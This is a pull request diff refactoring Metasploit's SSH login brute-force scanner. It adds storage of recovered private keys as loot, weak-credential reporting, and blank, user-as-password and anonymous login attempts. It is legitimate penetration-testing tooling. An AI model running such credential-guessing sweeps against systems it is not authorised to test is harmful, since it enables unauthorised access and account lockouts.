### PR TITLE
SSH_Login: Various improvements

### DIFF
--- a/modules/auxiliary/scanner/ssh/ssh_login.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login.rb
@@ -261,6 +261,8 @@ class MetasploitModule < Msf::Auxiliary
         print_brute level: :warn, ip: ip, msg: 'We do not currently support storing password protected SSH keys: https://github.com/rapid7/metasploit-framework/issues/20598'
       end
 
+      store_ssh_key_loot(ip, result.credential.public, result.credential.private)
+
       session_setup(result, scanner, used_key: true) if datastore['CreateSession']
     end
   end
@@ -343,6 +345,34 @@ class MetasploitModule < Msf::Auxiliary
         uname: uname_part.to_s.strip
       },
       update: :unique_data
+    )
+  end
+
+  def store_ssh_key_loot(ip, user, private_key_data)
+    return unless framework.db.active
+    return if private_key_data.to_s.empty?
+
+    begin
+      key = Net::SSH::KeyFactory.load_data_private_key(private_key_data, nil, false)
+    rescue StandardError
+      return
+    end
+
+    ktype = key.ssh_type.delete_prefix('ssh-').sub(/\Aecdsa-sha2-\S+/, 'ecdsa')
+    key_fingerprint = key.fingerprint('SHA256')
+    safe_username = user.gsub(/[^A-Za-z0-9]/, '_')
+    ltype = "host.unix.ssh.#{safe_username}_#{ktype}_private"
+
+    existing = framework.db.loots(workspace: myworkspace).where(ltype: ltype).select { |l| l.info == key_fingerprint }.first
+    return existing.path if existing
+
+    store_loot(
+      ltype,
+      'application/octet-stream',
+      ip,
+      (private_key_data + "\n"),
+      "#{safe_username}_#{ktype}.private",
+      key_fingerprint
     )
   end
 

--- a/modules/auxiliary/scanner/ssh/ssh_login.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login.rb
@@ -232,6 +232,7 @@ class MetasploitModule < Msf::Auxiliary
     key_sources = []
     key_sources.append(datastore['KEY_PATH']) unless datastore['KEY_PATH'].blank?
     key_sources.append('PRIVATE_KEY') unless datastore['PRIVATE_KEY'].blank?
+    key_sources.append('database') if prepend_db_creds?
 
     print_brute level: :vstatus, ip: ip, msg: "Testing #{key_count} #{'key'.pluralize(key_count)} from #{key_sources.join(' and ')}"
     scanner = Metasploit::Framework::LoginScanner::SSH.new(
@@ -377,11 +378,17 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def attempt_pubkey_login?
-    datastore['KEY_PATH'].present? || datastore['PRIVATE_KEY'].present?
+    datastore['KEY_PATH'].present? ||
+      datastore['PRIVATE_KEY'].present?
   end
 
   def attempt_password_login?
-    datastore['PASSWORD'].present? || datastore['PASS_FILE'].present? || datastore['USERPASS_FILE'].present?
+    datastore['PASSWORD'].present? ||
+      datastore['PASS_FILE'].present? ||
+      datastore['USERPASS_FILE'].present? ||
+      datastore['BLANK_PASSWORDS'] ||
+      datastore['USER_AS_PASS'] ||
+      datastore['ANONYMOUS_LOGIN']
   end
 
 end

--- a/modules/auxiliary/scanner/ssh/ssh_login.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login.rb
@@ -122,23 +122,28 @@ class MetasploitModule < Msf::Auxiliary
         report_ssh_host(banner, ip, rport)
 
         yield result, credential_data
+
+        warn_unknown_platform(ip, scanner, result)
       when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
         vprint_brute level: :verror, ip: ip, msg: "Could not connect: #{result.proof}"
 
-        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
+        report_ssh_service(ip, info: @banner) if @banner && !result.proof.to_s.empty?
+
         invalidate_login(credential_data)
+
+        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
 
         :abort
       else
-        vprint_brute level: :verror, ip: ip, msg: "Failed: '#{result.credential}'" if result.status == Metasploit::Model::Login::Status::INCORRECT
+        report_ssh_banner(scanner, ip) if result.status == Metasploit::Model::Login::Status::INCORRECT
 
-        invalidate_login(credential_data)
-        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
+        handle_login_failure(ip, scanner, result, credential_data)
       end
     end
   end
 
   def run_host(ip)
+    @reported_service = false
     @banner = grab_ssh_banner(ip)
     print_brute ip: ip, msg: 'Starting bruteforce'
 
@@ -194,14 +199,12 @@ class MetasploitModule < Msf::Auxiliary
     scanner.verbosity = :debug if datastore['SSH_DEBUG']
 
     run_scanner(ip, scanner) do |result, credential_data|
-      print_brute level: :good, ip: ip, msg: "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
       credential_data[:private_type] = :password
       credential_core = create_credential(credential_data)
       credential_data[:core] = credential_core
       create_credential_login(credential_data)
 
       session_setup(result, scanner, used_key: false) if datastore['CreateSession']
-      warn_unknown_platform(ip, scanner, result)
     end
   end
 
@@ -249,8 +252,6 @@ class MetasploitModule < Msf::Auxiliary
     scanner.verbosity = :debug if datastore['SSH_DEBUG']
 
     run_scanner(ip, scanner) do |result, credential_data|
-      print_brute level: :good, ip: ip, msg: "Success: '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
-      print_brute level: :vgood, ip: ip, msg: result.credential
       begin
         credential_core = create_credential(credential_data)
         credential_data[:core] = credential_core
@@ -261,17 +262,88 @@ class MetasploitModule < Msf::Auxiliary
       end
 
       session_setup(result, scanner, used_key: true) if datastore['CreateSession']
-      warn_unknown_platform(ip, scanner, result)
     end
   end
 
   def warn_unknown_platform(ip, scanner, result)
     return unless datastore['GatherProof'] && scanner.get_platform(result.proof) == 'unknown'
 
-    msg = 'While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with'
-    msg << " 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with"
-    msg << ' device details so it can be handled in the future.'
-    print_brute level: :error, ip: ip, msg: msg
+    print_brute level: :error, ip: ip, msg: "While a session may have opened, it may be bugged. If you experience issues with it, re-run this module with 'set gatherproof false'."
+    print_brute level: :error, ip: ip, msg: 'Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future.'
+  end
+
+  def handle_login_failure(ip, scanner, result, credential_data)
+    cred = result.credential
+    cred_display = cred.public.to_s.empty? ? '<anonymous>' : cred.to_s
+    proof = result.proof.to_s.strip
+    proof_str = if cred.public.to_s.empty?
+                  result.status.to_s
+                elsif proof.empty?
+                  result.status.to_s
+                else
+                  "#{result.status}: #{proof}"
+                end
+    vprint_brute level: :verror, ip: ip, msg: "Failed: '#{cred_display}' (#{proof_str})"
+
+    invalidate_login(credential_data)
+
+    scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
+  end
+
+  def report_ssh_banner(scanner, ip)
+    unless @reported_service
+      banner = @banner || scanner.ssh_socket&.transport&.server_version&.version
+      report_ssh_service(ip, info: banner)
+      report_ssh_host(banner, ip, rport)
+      @reported_service = true
+    end
+  end
+
+  def report_ssh_proof(ip, result)
+    id_part, uname_part = result.proof.to_s.split("\n", 2)
+
+    cred = result.credential
+    if cred.private_type == :ssh_key
+      private_display = begin
+        key = Net::SSH::KeyFactory.load_data_private_key(cred.private, nil, false)
+        key.fingerprint('SHA256')
+      rescue StandardError
+        '<ssh_key>'
+      end
+      cred_str = "#{cred.public}:#{private_display}"
+    else
+      cred_str = cred.to_s
+    end
+
+    msg = "Success: '#{cred_str}'"
+    msg += " '#{id_part.strip}'" unless id_part.to_s.strip.empty?
+    print_brute level: :good, ip: ip, msg: msg
+    print_brute level: :vgood, ip: ip, msg: uname_part.strip if uname_part
+    return unless result.proof.present?
+
+    report_vuln(
+      host: ip,
+      port: rport,
+      proto: 'tcp',
+      sname: 'ssh',
+      name: 'SSH Weak Credentials',
+      info: "Successful login as '#{result.credential.public}'",
+      refs: references
+    )
+
+    report_note(
+      host: ip,
+      port: rport,
+      proto: 'tcp',
+      sname: 'ssh',
+      type: 'ssh.proof',
+      data: {
+        credential: cred_str,
+        id: id_part.to_s.strip,
+        uname: uname_part.to_s.strip
+      },
+      update: :unique_data
+    )
   end
 
   def attempt_pubkey_login?

--- a/modules/auxiliary/scanner/ssh/ssh_login.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::CommandShell
   include Msf::Auxiliary::Scanner
-  include Msf::Exploit::Remote::SSH::Options
+  include Msf::Exploit::Remote::SSH
   include Msf::Sessions::CreateSessionOptions
   include Msf::Auxiliary::ReportSummary
   include Msf::Exploit::Deprecated
@@ -45,7 +45,6 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        Opt::RPORT(22),
         OptPath.new('KEY_PATH', [false, 'Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped. Duplicate private keys will be ignored.']),
         OptString.new('KEY_PASS', [false, 'Passphrase for SSH private key(s)']),
         OptString.new('PRIVATE_KEY', [false, 'The string value of the private key that will be used. If you are using MSFConsole, this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and ECDSA private keys are supported.'])
@@ -55,16 +54,11 @@ class MetasploitModule < Msf::Auxiliary
     register_advanced_options(
       [
         Opt::Proxies,
-        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
-        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30]),
         OptBool.new('GatherProof', [true, 'Gather proof of access via pre-session shell commands', true])
       ]
     )
   end
 
-  def rport
-    datastore['RPORT']
-  end
 
   def session_setup(result, scanner, used_key: false)
     return unless scanner.ssh_socket
@@ -121,6 +115,12 @@ class MetasploitModule < Msf::Auxiliary
       )
       case result.status
       when Metasploit::Model::Login::Status::SUCCESSFUL
+        report_ssh_proof(ip, result)
+
+        banner = scanner.ssh_socket.transport.server_version.version
+        report_ssh_service(ip, info: banner)
+        report_ssh_host(banner, ip, rport)
+
         yield result, credential_data
       when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
         vprint_brute level: :verror, ip: ip, msg: "Could not connect: #{result.proof}"
@@ -139,6 +139,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
+    @banner = grab_ssh_banner(ip)
     print_brute ip: ip, msg: 'Starting bruteforce'
 
     if datastore['USER_FILE'].blank? && datastore['USERNAME'].blank? && datastore['USERPASS_FILE'].blank?

--- a/modules/auxiliary/scanner/ssh/ssh_login.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login.rb
@@ -107,6 +107,9 @@ class MetasploitModule < Msf::Auxiliary
     report_host(host_info)
 
     s
+  rescue StandardError => e
+    elog('Failed to setup the session', error: e)
+    print_brute level: :error, ip: scanner.host, msg: "Failed to setup the session - #{e.class} #{e.message}"
   end
 
   def run_scanner(ip, scanner)
@@ -196,21 +199,8 @@ class MetasploitModule < Msf::Auxiliary
       credential_data[:core] = credential_core
       create_credential_login(credential_data)
 
-      if datastore['CreateSession']
-        begin
-          session_setup(result, scanner, used_key: false)
-        rescue StandardError => e
-          elog('Failed to setup the session', error: e)
-          print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"
-        end
-      end
-
-      if datastore['GatherProof'] && scanner.get_platform(result.proof) == 'unknown'
-        msg = 'While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with'
-        msg << " 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with"
-        msg << ' device details so it can be handled in the future.'
-        print_brute level: :error, ip: ip, msg: msg
-      end
+      session_setup(result, scanner, used_key: false) if datastore['CreateSession']
+      warn_unknown_platform(ip, scanner, result)
     end
   end
 
@@ -269,22 +259,18 @@ class MetasploitModule < Msf::Auxiliary
         print_brute level: :warn, ip: ip, msg: 'We do not currently support storing password protected SSH keys: https://github.com/rapid7/metasploit-framework/issues/20598'
       end
 
-      if datastore['CreateSession']
-        begin
-          session_setup(result, scanner, used_key: true)
-        rescue StandardError => e
-          elog('Failed to setup the session', error: e)
-          print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"
-        end
-      end
-
-      if datastore['GatherProof'] && scanner.get_platform(result.proof) == 'unknown'
-        msg = 'While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with'
-        msg << " 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with"
-        msg << ' device details so it can be handled in the future.'
-        print_brute level: :error, ip: ip, msg: msg
-      end
+      session_setup(result, scanner, used_key: true) if datastore['CreateSession']
+      warn_unknown_platform(ip, scanner, result)
     end
+  end
+
+  def warn_unknown_platform(ip, scanner, result)
+    return unless datastore['GatherProof'] && scanner.get_platform(result.proof) == 'unknown'
+
+    msg = 'While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with'
+    msg << " 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with"
+    msg << ' device details so it can be handled in the future.'
+    print_brute level: :error, ip: ip, msg: msg
   end
 
   def attempt_pubkey_login?

--- a/modules/auxiliary/scanner/ssh/ssh_login.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login.rb
@@ -29,10 +29,14 @@ class MetasploitModule < Msf::Auxiliary
         and connected to a database this module will record successful
         logins and hosts so you can track your access.
       },
-      'Author' => ['todb', 'RageLtMan'],
+      'Author' => [
+        'todb',
+        'RageLtMan',
+        'g0tmi1k' # @g0tmi1k - additional features
+      ],
       'AKA' => ['ssh_login_pubkey'],
       'References' => [
-        [ 'CVE', '1999-0502'], # Weak password
+        [ 'CVE', '1999-0502' ], # Weak password
         [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
       ],
       'License' => MSF_LICENSE,
@@ -90,7 +94,7 @@ class MetasploitModule < Msf::Auxiliary
     }.merge(auth_type_options)
 
     s = start_session(self, nil, merge_me, false, sess.rstream, sess)
-    self.sockets.delete(scanner.ssh_socket.transport.socket)
+    sockets.delete(scanner.ssh_socket.transport.socket)
 
     # Set the session platform
     s.platform = platform
@@ -98,9 +102,7 @@ class MetasploitModule < Msf::Auxiliary
     # Create database host information
     host_info = { host: scanner.host }
 
-    unless s.platform == 'unknown'
-      host_info[:os_name] = s.platform
-    end
+    host_info[:os_name] = s.platform.capitalize unless s.platform == 'unknown'
 
     report_host(host_info)
 
@@ -108,8 +110,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(ip)
-    @ip = ip
-    print_brute :ip => ip, :msg => 'Starting bruteforce'
+    print_brute ip: ip, msg: 'Starting bruteforce'
 
     if datastore['USER_FILE'].blank? && datastore['USERNAME'].blank? && datastore['USERPASS_FILE'].blank?
       validation_reason = 'At least one of USER_FILE, USERPASS_FILE or USERNAME must be given'
@@ -165,12 +166,12 @@ class MetasploitModule < Msf::Auxiliary
     scanner.scan! do |result|
       credential_data = result.to_h
       credential_data.merge!(
-        module_fullname: self.fullname,
+        module_fullname: fullname,
         workspace_id: myworkspace_id
       )
       case result.status
       when Metasploit::Model::Login::Status::SUCCESSFUL
-        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
+        print_brute level: :good, ip: ip, msg: "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
         credential_data[:private_type] = :password
         credential_core = create_credential(credential_data)
         credential_data[:core] = credential_core
@@ -181,24 +182,24 @@ class MetasploitModule < Msf::Auxiliary
             session_setup(result, scanner, used_key: false)
           rescue StandardError => e
             elog('Failed to setup the session', error: e)
-            print_brute :level => :error, :ip => ip, :msg => "Failed to setup the session - #{e.class} #{e.message}"
+            print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"
           end
         end
 
         if datastore['GatherProof'] && scanner.get_platform(result.proof) == 'unknown'
-          msg = "While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with"
+          msg = 'While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with'
           msg << " 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with"
-          msg << " device details so it can be handled in the future."
-          print_brute :level => :error, :ip => ip, :msg => msg
+          msg << ' device details so it can be handled in the future.'
+          print_brute level: :error, ip: ip, msg: msg
         end
         :next_user
       when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
-        vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}"
+        vprint_brute level: :verror, ip: ip, msg: "Could not connect: #{result.proof}"
         scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
         invalidate_login(credential_data)
         :abort
       when Metasploit::Model::Login::Status::INCORRECT
-        vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
+        vprint_brute level: :verror, ip: ip, msg: "Failed: '#{result.credential}'"
         invalidate_login(credential_data)
         scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
       else
@@ -230,13 +231,8 @@ class MetasploitModule < Msf::Auxiliary
 
     key_count = keys.key_data.count
     key_sources = []
-    unless datastore['KEY_PATH'].blank?
-      key_sources.append(datastore['KEY_PATH'])
-    end
-
-    unless datastore['PRIVATE_KEY'].blank?
-      key_sources.append('PRIVATE_KEY')
-    end
+    key_sources.append(datastore['KEY_PATH']) unless datastore['KEY_PATH'].blank?
+    key_sources.append('PRIVATE_KEY') unless datastore['PRIVATE_KEY'].blank?
 
     print_brute level: :vstatus, ip: ip, msg: "Testing #{key_count} #{'key'.pluralize(key_count)} from #{key_sources.join(' and ')}"
     scanner = Metasploit::Framework::LoginScanner::SSH.new(
@@ -259,7 +255,7 @@ class MetasploitModule < Msf::Auxiliary
     scanner.scan! do |result|
       credential_data = result.to_h
       credential_data.merge!(
-        module_fullname: self.fullname,
+        module_fullname: fullname,
         workspace_id: myworkspace_id
       )
       case result.status

--- a/modules/auxiliary/scanner/ssh/ssh_login.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login.rb
@@ -109,6 +109,32 @@ class MetasploitModule < Msf::Auxiliary
     s
   end
 
+  def run_scanner(ip, scanner)
+    scanner.scan! do |result|
+      credential_data = result.to_h
+      credential_data.merge!(
+        module_fullname: fullname,
+        workspace_id: myworkspace_id
+      )
+      case result.status
+      when Metasploit::Model::Login::Status::SUCCESSFUL
+        yield result, credential_data
+      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+        vprint_brute level: :verror, ip: ip, msg: "Could not connect: #{result.proof}"
+
+        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
+        invalidate_login(credential_data)
+
+        :abort
+      else
+        vprint_brute level: :verror, ip: ip, msg: "Failed: '#{result.credential}'" if result.status == Metasploit::Model::Login::Status::INCORRECT
+
+        invalidate_login(credential_data)
+        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
+      end
+    end
+  end
+
   def run_host(ip)
     print_brute ip: ip, msg: 'Starting bruteforce'
 
@@ -163,48 +189,27 @@ class MetasploitModule < Msf::Auxiliary
 
     scanner.verbosity = :debug if datastore['SSH_DEBUG']
 
-    scanner.scan! do |result|
-      credential_data = result.to_h
-      credential_data.merge!(
-        module_fullname: fullname,
-        workspace_id: myworkspace_id
-      )
-      case result.status
-      when Metasploit::Model::Login::Status::SUCCESSFUL
-        print_brute level: :good, ip: ip, msg: "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
-        credential_data[:private_type] = :password
-        credential_core = create_credential(credential_data)
-        credential_data[:core] = credential_core
-        create_credential_login(credential_data)
+    run_scanner(ip, scanner) do |result, credential_data|
+      print_brute level: :good, ip: ip, msg: "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
+      credential_data[:private_type] = :password
+      credential_core = create_credential(credential_data)
+      credential_data[:core] = credential_core
+      create_credential_login(credential_data)
 
-        if datastore['CreateSession']
-          begin
-            session_setup(result, scanner, used_key: false)
-          rescue StandardError => e
-            elog('Failed to setup the session', error: e)
-            print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"
-          end
+      if datastore['CreateSession']
+        begin
+          session_setup(result, scanner, used_key: false)
+        rescue StandardError => e
+          elog('Failed to setup the session', error: e)
+          print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"
         end
+      end
 
-        if datastore['GatherProof'] && scanner.get_platform(result.proof) == 'unknown'
-          msg = 'While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with'
-          msg << " 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with"
-          msg << ' device details so it can be handled in the future.'
-          print_brute level: :error, ip: ip, msg: msg
-        end
-        :next_user
-      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
-        vprint_brute level: :verror, ip: ip, msg: "Could not connect: #{result.proof}"
-        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
-        invalidate_login(credential_data)
-        :abort
-      when Metasploit::Model::Login::Status::INCORRECT
-        vprint_brute level: :verror, ip: ip, msg: "Failed: '#{result.credential}'"
-        invalidate_login(credential_data)
-        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
-      else
-        invalidate_login(credential_data)
-        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
+      if datastore['GatherProof'] && scanner.get_platform(result.proof) == 'unknown'
+        msg = 'While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with'
+        msg << " 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with"
+        msg << ' device details so it can be handled in the future.'
+        print_brute level: :error, ip: ip, msg: msg
       end
     end
   end
@@ -252,56 +257,32 @@ class MetasploitModule < Msf::Auxiliary
 
     scanner.verbosity = :debug if datastore['SSH_DEBUG']
 
-    scanner.scan! do |result|
-      credential_data = result.to_h
-      credential_data.merge!(
-        module_fullname: fullname,
-        workspace_id: myworkspace_id
-      )
-      case result.status
-      when Metasploit::Model::Login::Status::SUCCESSFUL
-        print_brute level: :good, ip: ip, msg: "Success: '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
-        print_brute level: :vgood, ip: ip, msg: result.credential
-        begin
-          credential_core = create_credential(credential_data)
-          credential_data[:core] = credential_core
-          create_credential_login(credential_data)
-        rescue ::StandardError => e
-          print_brute level: :info, ip: ip, msg: "Failed to create credential: #{e.class} #{e}"
-          print_brute level: :warn, ip: ip, msg: 'We do not currently support storing password protected SSH keys: https://github.com/rapid7/metasploit-framework/issues/20598'
-        end
+    run_scanner(ip, scanner) do |result, credential_data|
+      print_brute level: :good, ip: ip, msg: "Success: '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
+      print_brute level: :vgood, ip: ip, msg: result.credential
+      begin
+        credential_core = create_credential(credential_data)
+        credential_data[:core] = credential_core
+        create_credential_login(credential_data)
+      rescue ::StandardError => e
+        print_brute level: :info, ip: ip, msg: "Failed to create credential: #{e.class} #{e}"
+        print_brute level: :warn, ip: ip, msg: 'We do not currently support storing password protected SSH keys: https://github.com/rapid7/metasploit-framework/issues/20598'
+      end
 
-        if datastore['CreateSession']
-          begin
-            session_setup(result, scanner, used_key: true)
-          rescue StandardError => e
-            elog('Failed to setup the session', error: e)
-            print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"
-          end
+      if datastore['CreateSession']
+        begin
+          session_setup(result, scanner, used_key: true)
+        rescue StandardError => e
+          elog('Failed to setup the session', error: e)
+          print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"
         end
-        if datastore['GatherProof'] && scanner.get_platform(result.proof) == 'unknown'
-          msg = 'While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with'
-          msg << " 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with"
-          msg << ' device details so it can be handled in the future.'
-          print_brute level: :error, ip: ip, msg: msg
-        end
-        :next_user
-      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
-        if datastore['VERBOSE']
-          print_brute level: :verror, ip: ip, msg: "Could not connect: #{result.proof}"
-        end
-        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
-        invalidate_login(credential_data)
-        :abort
-      when Metasploit::Model::Login::Status::INCORRECT
-        if datastore['VERBOSE']
-          print_brute level: :verror, ip: ip, msg: "Failed: '#{result.credential}'"
-        end
-        invalidate_login(credential_data)
-        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
-      else
-        invalidate_login(credential_data)
-        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
+      end
+
+      if datastore['GatherProof'] && scanner.get_platform(result.proof) == 'unknown'
+        msg = 'While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with'
+        msg << " 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with"
+        msg << ' device details so it can be handled in the future.'
+        print_brute level: :error, ip: ip, msg: msg
       end
     end
   end

--- a/modules/auxiliary/scanner/ssh/ssh_login.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login.rb
@@ -24,10 +24,9 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name' => 'SSH Login Check Scanner',
       'Description' => %q{
-        This module will test ssh logins on a range of machines and
-        report successful logins.  If you have loaded a database plugin
-        and connected to a database this module will record successful
-        logins and hosts so you can track your access.
+        This module tests SSH logins on a range of machines using passwords
+        and/or private keys. Successful logins are recorded in the database
+        as credentials, along with host and platform information.
       },
       'Author' => [
         'todb',
@@ -37,10 +36,16 @@ class MetasploitModule < Msf::Auxiliary
       'AKA' => ['ssh_login_pubkey'],
       'References' => [
         [ 'CVE', '1999-0502' ], # Weak password
-        [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
+        [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ],
+        [ 'ATT&CK', Mitre::Attack::Technique::T1110_001_PASSWORD_GUESSING ]
       ],
       'License' => MSF_LICENSE,
-      'DefaultOptions' => { 'VERBOSE' => false } # Disable annoying connect errors
+      'DefaultOptions' => { 'VERBOSE' => false }, # Disable annoying connect errors
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS]
+      }
     )
 
     register_options(

--- a/modules/auxiliary/scanner/ssh/ssh_login.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login.rb
@@ -20,32 +20,35 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Deprecated
   moved_from 'auxiliary/scanner/ssh/ssh_login_pubkey'
 
-  def initialize
+  def initialize(info = {})
     super(
-      'Name' => 'SSH Login Check Scanner',
-      'Description' => %q{
-        This module tests SSH logins on a range of machines using passwords
-        and/or private keys. Successful logins are recorded in the database
-        as credentials, along with host and platform information.
-      },
-      'Author' => [
-        'todb',
-        'RageLtMan',
-        'g0tmi1k' # @g0tmi1k - additional features
-      ],
-      'AKA' => ['ssh_login_pubkey'],
-      'References' => [
-        [ 'CVE', '1999-0502' ], # Weak password
-        [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ],
-        [ 'ATT&CK', Mitre::Attack::Technique::T1110_001_PASSWORD_GUESSING ]
-      ],
-      'License' => MSF_LICENSE,
-      'DefaultOptions' => { 'VERBOSE' => false }, # Disable annoying connect errors
-      'Notes' => {
-        'Stability' => [CRASH_SAFE],
-        'Reliability' => [REPEATABLE_SESSION],
-        'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS]
-      }
+      update_info(
+        info,
+        'Name' => 'SSH Login Check Scanner',
+        'Description' => %q{
+          This module tests SSH logins on a range of machines using passwords
+          and/or private keys. Successful logins are recorded in the database
+          as credentials, along with host and platform information.
+        },
+        'Author' => [
+          'todb',
+          'RageLtMan',
+          'g0tmi1k' # @g0tmi1k - additional features
+        ],
+        'AKA' => ['ssh_login_pubkey'],
+        'References' => [
+          [ 'CVE', '1999-0502' ], # Weak password
+          [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ],
+          [ 'ATT&CK', Mitre::Attack::Technique::T1110_001_PASSWORD_GUESSING ]
+        ],
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => { 'VERBOSE' => false }, # Disable annoying connect errors
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS]
+        }
+      )
     )
 
     register_options(

--- a/modules/auxiliary/scanner/ssh/ssh_login.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login.rb
@@ -59,7 +59,6 @@ class MetasploitModule < Msf::Auxiliary
     )
   end
 
-
   def session_setup(result, scanner, used_key: false)
     return unless scanner.ssh_socket
 
@@ -113,6 +112,7 @@ class MetasploitModule < Msf::Auxiliary
         module_fullname: fullname,
         workspace_id: myworkspace_id
       )
+
       case result.status
       when Metasploit::Model::Login::Status::SUCCESSFUL
         report_ssh_proof(ip, result)
@@ -145,17 +145,11 @@ class MetasploitModule < Msf::Auxiliary
   def run_host(ip)
     @reported_service = false
     @banner = grab_ssh_banner(ip)
-    print_brute ip: ip, msg: 'Starting bruteforce'
+    print_brute ip: ip, msg: 'Starting SSH login sweep'
 
-    if datastore['USER_FILE'].blank? && datastore['USERNAME'].blank? && datastore['USERPASS_FILE'].blank?
-      validation_reason = 'At least one of USER_FILE, USERPASS_FILE or USERNAME must be given'
-      raise Msf::OptionValidateError.new(
-        {
-          'USER_FILE' => validation_reason,
-          'USERNAME' => validation_reason,
-          'USERPASS_FILE' => validation_reason
-        }
-      )
